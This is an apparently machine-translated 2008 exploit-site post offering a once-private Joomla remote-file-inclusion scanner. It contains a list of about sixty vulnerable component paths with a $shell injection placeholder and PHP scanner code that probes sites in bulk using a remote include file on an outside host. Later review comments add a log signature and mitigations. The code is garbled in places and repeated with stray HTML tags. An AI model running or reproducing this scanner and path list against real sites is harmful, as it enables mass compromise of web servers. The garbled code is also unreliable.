Joomla Exploiter-exploit warning-the black bar safety net

2008-06-06T00:00:00
ID MYHACK58:62200819273
Type myhack58
Reporter 佚名
Modified 2008-06-06T00:00:00

Description

Author: Casi. An old tool that was private way back and is now public. It scans a Joomla site very quickly against a list of possible RFI (remote file inclusion) exploit paths by trying to include the text file below. Enjoy!

txt.txt

Code:

List.txt ./ com_directory/modules/mod_pxt_latest. php? GLOBALS[mosConfig_absolute_path]=$shell ./ administrator/components/com_juser/xajax_functions. php? mosConfig_absolute_path=$shell ./ administrator/components/com_jjgallery/admin. jjgallery. php? mosConfig_absolute_path=$shell ./ administrator/components/com_color/admin. color. php? mosConfig_live_site=$shell ./ administrator/components/com_joomla_flash_uploader/uninstall. joomla_flash_uploader. php? mosConfig_absolute_path=$shell ./ administrator/components/com_jcs/jcs. function. php? mosConfig_absolute_path=$shell ./ path/administrator/components/com_jcs/view/add. php? mosConfig_absolute_path=$shell ./ path/administrator/components/com_jcs/view/history. php? mosConfig_absolute_path=$shell ./ path/administrator/components/com_jcs/view/register. php? mosConfig_absolute_path=$shell ./ path/administrator/components/com_jcs/views/list. sub. html. php? mosConfig_absolute_path=$shell ./ path/administrator/components/com_jcs/views/reports. html. php? mosConfig_absolute_path=$shell ./ components/com_mp3_allopass/allopass. php? mosConfig_live_site=$shell ./ path/components/com_mp3_allopass/allopass-error. php? mosConfig_live_site=$shell ./ administrator/components/com_mosmedia/includes/credits. html. php? mosConfig_absolute_path=$shell ./ administrator/components/com_mosmedia/includes/info. html. php? mosConfig_absolute_path=$shell ./ administrator/components/com_mosmedia/includes/media. divs. php? mosConfig_absolute_path=$shell ./ administrator/components/com_mosmedia/includes/media. divs. js. php? mosConfig_absolute_path=$shell ./ administrator/components/com_mosmedia/includes/purchase. html. php? mosConfig_absolute_path=$shell ./ administrator/components/com_mosmedia/includes/support. html. php? mosConfig_absolute_path=$shell ./ administrator/components/com_wmtportfolio/admin. wmtportfolio. php? mosConfig_absolute_path=$shell ./ administrator/components/com_wmtgallery/admin. wmtgallery. php? 
mosConfig_live_site=$shell ./ administrator/components/com_panoramic/admin. panoramic. php? mosConfig_live_site=$shell ./ components/com_slideshow/admin. slideshow1. php? mosConfig_live_site=$shell ./ administrator/components/com_joom12pic/admin. joom12pic. php? mosConfig_live_site=$shell ./ administrator/components/com_joomlaflashfun/admin. joomlaflashfun. php? mosConfig_live_site=$shell ./ administrator/components/com_joomlaradiov5/admin. joomlaradiov5. php? mosConfig_live_site=$shell ./ administrator/components/com_jpack/includes/CAltInstaller. php? mosConfig_absolute_path=$shell ./ components/com_articles. php? absolute_path=$shell ./ classes/html/com_articles. php? absolute_path=$shell ./ modules/mod_as_category/mod_as_category. php? mosConfig_absolute_path=$shell ./ modules/mod_as_category. php? mosConfig_absolute_path=$shell ./ components/com_mosmedia/media. tab. php? mosConfig_absolute_path=$shell ./ components/com_mosmedia/media. divs. php? mosConfig_absolute_path=$shell ./ components/com_thopper/inc/contact_type. php? mosConfig_absolute_path=$shell ./ components/com_thopper/inc/itemstatus_type. php? mosConfig_absolute_path=$shell ./ components/com_thopper/inc/projectstatus_type. php? mosConfig_absolute_path=$shell ./ components/com_thopper/inc/request_type. php? mosConfig_absolute_path=$shell ./ components/com_thopper/inc/responses_type. php? mosConfig_absolute_path=$shell ./ components/com_thopper/inc/timelog_type. php? mosConfig_absolute_path=$shell ./ components/com_thopper/inc/urgency_type. php? mosConfig_absolute_path=$shell ./ components/com_joomlaboard/file_upload. php? sbp=$shell ./ administrator/components/com_swmenupro/ImageManager/Classes/ImageManager. php? mosConfig_absolute_path=$shell ./ components/com_swmenupro/ImageManager/Classes/ImageManager. php? mosConfig_absolute_path=$shell ./ components/com_reporter/reporter. logic. php? mosConfig_absolute_path=$shell ./ administrator/components/com_kochsuite/config. kochsuite. php? 
mosConfig_absolute_path=$shell ./ administrator/components/com_linkdirectory/toolbar. linkdirectory. html. php? mosConfig_absolute_path=$shell ./ components/com_artlinks/artlinks. dispnew. php? mosConfig_absolute_path=$shell ./ components/com_mtree/Savant2/Savant2_Plugin_textarea. php? mosConfig_absolute_path=$shell ./ administrator/components/com_jim/install. jim. php? mosConfig_absolute_path=$shell ./ administrator/components/com_webring/admin. webring. docs. php? component_dir=$shell ./ components/com_jd-wiki/lib/tpl/default/main. php? mosConfig_absolute_path=$shell ./ components/com_lmo/lmo. php? mosConfig_absolute_path=$shell ./ administrator/components/com_bayesiannaivefilter/lang. php? mosConfig_absolute_path=$shell <html> <body> <style>

body { background-color: #2b2b2b; background-image: url(images/background.gif); font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; color: #B0B0B0; } . border { border: 1px solid #0 0 6 6 9 9; background-color:#0 0 0 0 0 0; } . header { background-color:#0 0 0 0 0 0; } . content-background { background-color:#0 0 0 0 0 0; } . text-strong { font-weight:bold; } . content-header { background-image:url(images/content-header.gif); } . content-border { border: 1px solid #0 0 6 6 9 9; background-color:#1A1A1A; } . content-background { background-color:#0 0 0 0 0 0; background-image:url(images/content-background.gif); } a:link { color: #0 0 6 6 9 9; } a:visited { color: #0 0 6 6 9 9; } a:hover { color: #CCCCCC; } a:active { color: #CCCCCC; } textarea { font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; color: #0 0 6 6 9 9; background-color:#1 6 1 6 1 6; border: #0 0 6 6 9 9 1px solid; } input { font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; color: #0 0 6 6 9 9; background-color:#1 6 1 6 1 6; border: #0 0 6 6 9 9 1px solid; } select { font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; color: #0 0 6 6 9 9; background-color:#1 6 1 6 1 6; border: #0 0 6 6 9 9 1px solid; } </style>

<? PHP if(isset($_POST['vic'])){

/**
 * Probe one base URL against every path template in a list file.
 *
 * $list is read line by line with file(), the literal placeholder `$shell`
 * in each line is replaced by $txt, the result is appended to $host, and the
 * URL is fetched through browse(). A hit is reported when the response
 * contains the marker "Mad-Hatter is the greatest!" — presumably the body of
 * the remote text file named in $txt, so the marker showing up would mean the
 * target pulled in and rendered that file (TODO confirm; the file's content
 * is not on this page).
 *
 * Review notes:
 * - `ereg dividing(` is not valid PHP as printed; this looks like
 *   extraction/translation damage, so the listing does not parse as shown.
 * - $rfi_vuln is assigned and never used; the function returns nothing and
 *   reports only through echo.
 * - $list reaches this function from $_POST['list'] via arrise() and goes
 *   straight to file(); $can is echoed without HTML escaping.
 * - Log signature for defenders: requests where one of the parameters in
 *   the path list (mosConfig_absolute_path, mosConfig_live_site,
 *   GLOBALS[mosConfig_absolute_path], absolute_path, sbp, component_dir)
 *   carries an http:// URL. This inclusion class generally needs the target
 *   PHP to accept request-supplied globals and remote includes; keeping
 *   register_globals and allow_url_include off and removing the listed
 *   extensions closes it.
 *
 * @param string $host Base URL that each path template is appended to.
 * @param string $list Path or URL of the template list.
 * @param string $txt  Value substituted for the `$shell` placeholder.
 * @return void
 */
function rfi_scan($host, $list, $txt) { $rfi_vuln = array(); $line = file($list); foreach($line as $scan) { $scan = str_replace('$shell',$txt, $scan); $can = $host . $scan; $look = browse($can); if(ereg dividing("Mad-Hatter is the greatest!", $look)) { echo "<b>" . $can ."& lt;/b><br>"; }else{ echo "[~] Failed with $can <br>"; } } }

/**
 * Fetch a URL with cURL and return the response body.
 *
 * Sets a fixed User-Agent, follows redirects, and has curl_exec() return the
 * body instead of printing it. The return value is passed back unchecked, so
 * callers receive false when the transfer fails.
 *
 * Review notes:
 * - The timeout is printed as the string '1 0'; the embedded space looks like
 *   extraction damage (TODO confirm the intended value).
 * - The handle is never closed and no curl_error()/status check is made.
 * - The User-Agent is hard-coded and sent on every request, which gives a
 *   fixed string to look for in web server access logs:
 *   Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
 *
 * @param string $url URL to request.
 * @return string|false Response body, or false on cURL failure.
 */
function browse($url) { $ch = curl_init(); curl_setopt ($ch, CURLOPT_URL, $url); curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"); curl_setopt ($ch, CURLOPT_TIMEOUT, '1 0'); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); $store = curl_exec ($ch); return $store; }

/**
 * Split the submitted site list into lines and run rfi_scan() for each.
 *
 * As printed, the loop calls count() on each line (a string) and passes the
 * loop counter $y as rfi_scan()'s first argument; the line held in $array is
 * used only for count(). count() on a string raises a warning on PHP 7.2+
 * and a TypeError on PHP 8. There is no return statement, so the
 * `echo arrise(...)` at the call site prints nothing of its own; all output
 * comes from rfi_scan().
 *
 * @param string $input Newline-separated text from the "vic" form field.
 * @param string $list  Passed through to rfi_scan() unchanged.
 * @param string $check Passed through to rfi_scan() unchanged.
 * @return void
 */
function arrise($input, $list, $check) { $input = explode("\n", $input); foreach($input as $array) { $y = 0; $x = count($array); while($y < $x) { rfi_scan($y, $list, $check); $y++; } }

}

/**
 * Extract the text between two delimiters.
 *
 * Splits $source on $preg, takes piece number $num (0-based), and returns
 * the part of that piece that precedes the first $preg1. Both delimiters are
 * plain strings handed to explode(), not regular expressions. Nothing in the
 * listing shown here calls this helper.
 *
 * @param string $source Text to search.
 * @param int    $num    Index of the piece to keep after splitting on $preg.
 * @param string $preg   Opening delimiter.
 * @param string $preg1  Closing delimiter.
 * @return string Text of the selected piece up to $preg1.
 */
function input_match($source, $num, $preg, $preg1)
{
    $afterOpen = explode($preg, $source);
    $selected = $afterOpen[$num];
    $beforeClose = explode($preg1, $selected);

    return $beforeClose[0];
}

// POST branch entry point: the three form fields go to arrise() unvalidated.
// $_POST['list'] ends up in file() inside rfi_scan(), and $_POST['check'] is
// echoed back inside the probed URL without HTML escaping.
echo arrise($_POST['vic'], $_POST['list'], $_POST['check']);

}else{ echo '<center> <table width="3 3%" height="9 0" border="0" cellpadding="3" cellspacing="1" class="content-border" id="table3"> <tr> <td class="content-background"> <div align="center"><center><font face="Trebuchet MS" size=3> <b>Private Joomla Scanner: Mad-Hatter</b> </font> </center> <br> <font face="Trebuchet MS" size=2 color=#0 0 6 6 9 9> <hr> <form method="POST" action="'.$ _SERVER['PHP_SELF'].'"& gt; Trojan List: <input type="text" name="list"value="http://sovol.fr/cv/RFI.txt"><br> Text to Check: <input type="text" name="check" value="http://sovol.fr/cv/txt.txt"><br> Site to Check: <textarea name="vic" cols="6 4" rows="1 6">Put all sites per line</textarea> <input type="submit" name="submit" value="Scan">';

$list = $_POST['list']; $check = $_POST['check']; $vic = $_POST['vic']; } ?& gt;<html><br/><body><br/><style><br/><br/>body {<br/> background-color: #2b2b2b;<br/> background-image: url(images/background.gif);<br/> font-family: Verdana, Arial, Helvetica, sans-serif;<br/> font-size: 12px;<br/> color: #B0B0B0;<br/>}<br/>. border<br/>{<br/>border: 1px solid #0 0 6 6 9 9;<br/>background-color:#0 0 0 0 0 0;<br/>}<br/>. header<br/>{<br/>background-color:#0 0 0 0 0 0;<br/>}<br/>. content-background<br/>{<br/>background-color:#0 0 0 0 0 0;<br/>}<br/>. text-strong<br/>{<br/>font-weight:bold;<br/>}<br/>. content-header<br/>{<br/>background-image:url(images/content-header.gif);<br/>}<br/>. content-border<br/>{<br/>border: 1px solid #0 0 6 6 9 9;<br/>background-color:#1A1A1A;<br/>}<br/>. content-background<br/>{<br/>background-color:#0 0 0 0 0 0;<br/>background-image:url(images/content-background.gif);<br/>}<br/>a:link {<br/> color: #0 0 6 6 9 9;<br/>}<br/>a:visited {<br/> color: #0 0 6 6 9 9;<br/> }<br/>a:hover {<br/> color: #CCCCCC;<br/>}<br/>a:active {<br/> color: #CCCCCC;<br/>}<br/>textarea<br/>{<br/> font-family: Verdana, Arial, Helvetica, sans-serif;<br/> font-size: 10px;<br/> color: #0 0 6 6 9 9;<br/> background-color:#1 6 1 6 1 6;<br/> border: #0 0 6 6 9 9 1px solid;<br/>}<br/>input<br/>{<br/> font-family: Verdana, Arial, Helvetica, sans-serif;<br/> font-size: 10px;<br/> color: #0 0 6 6 9 9;<br/> background-color:#1 6 1 6 1 6;<br/> border: #0 0 6 6 9 9 1px solid;<br/> }<br/> select<br/> {<br/> font-family: Verdana, Arial, Helvetica, sans-serif;<br/> font-size: 10px;<br/> color: #0 0 6 6 9 9;<br/> background-color:#1 6 1 6 1 6;<br/> border: #0 0 6 6 9 9 1px solid;<br/> }<br/></style><br/><br/><br/><? PHP<br/>if(isset($_POST['vic'])){<br/><br/>function rfi_scan($host, $list, $txt)<br/>{<br/>$rfi_vuln = array();<br/>$line = file($list);<br/> foreach($line as $scan)<br/> {< br/> $scan = str_replace('$shell',$txt, $scan);<br/> $can = $host . 
$scan;<br/> $look = browse($can);<br/> if(ereg dividing("Mad-Hatter is the greatest!", $look))<br/> {<br/> echo "<b>" . $can ."& lt;/b><br>";<br/> }else{<br/> echo "[~] Failed with $can <br>";<br/> }<br/> }<br/>}<br/><br/>function browse($url)<br/>{<br/> $ch = curl_init();<br/> curl_setopt ($ch, CURLOPT_URL, $url);<br/> curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");<br/> curl_setopt ($ch, CURLOPT_TIMEOUT, '1 0');<br/> curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);<br/> curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);< br/> $store = curl_exec ($ch);<br/>return $store;<br/>}<br/><br/>function arrise($input, $list, $check)<br/>{<br/> $input = explode("\n", $input);<br/> foreach($input as $array)<br/> {<br/> $y = 0;<br/> $x = count($array);<br/> while($y < $x)<br/> {<br/> rfi_scan($y, $list, $check);<br/> $y++;<br/> }<br/> }<br/>< br/>}<br/><br/>function input_match($source, $num, $preg, $preg1)<br/>{<br/>$parts = explode($preg, $source);<br/> $parts = explode($preg1, $parts[$num]);<br/> $var = $parts[0];<br/>return $parts[0];<br/>}<br/><br/>echo arrise($_POST['vic'], $_POST['list'], $_POST['check']); <br/><br/>}else{<br/>echo '<center><br/><table width="3 3%" height="9 0" border="0" cellpadding="3" cellspacing="1" class="content-border" id="table3"><br/><tr><br/>< td class="content-background"><br/><div align="center"><center><font face="Trebuchet MS" size=3><br/> <b>Private Joomla Scanner: Mad-Hatter</b><br/></font><br/></center>< br/><br><br/><font face="Trebuchet MS" size=2 color=#0 0 6 6 9 9><br/><hr><br/>

<form method="POST" action="'.$ _SERVER['PHP_SELF'].'"& gt;<br/>Trojandownloader List: <input type="text" name="list" value="http://sovol.fr/cv/RFI.txt"><br><br/>Text to Check:

<input type="text" name="check" value="http://sovol.fr/cv/txt.txt"><br><br/>the Site to Check: <textarea name="vic" cols="6 4" rows="1 6">

Put all sites per line</textarea><br/><input type="submit" name="submit" value="Scan">';<br/><br/>$list = $_POST['list'];<br/>$check = $_POST['check'];<br/>$vic = $_POST['vic'];<br/>} <br/>?& gt;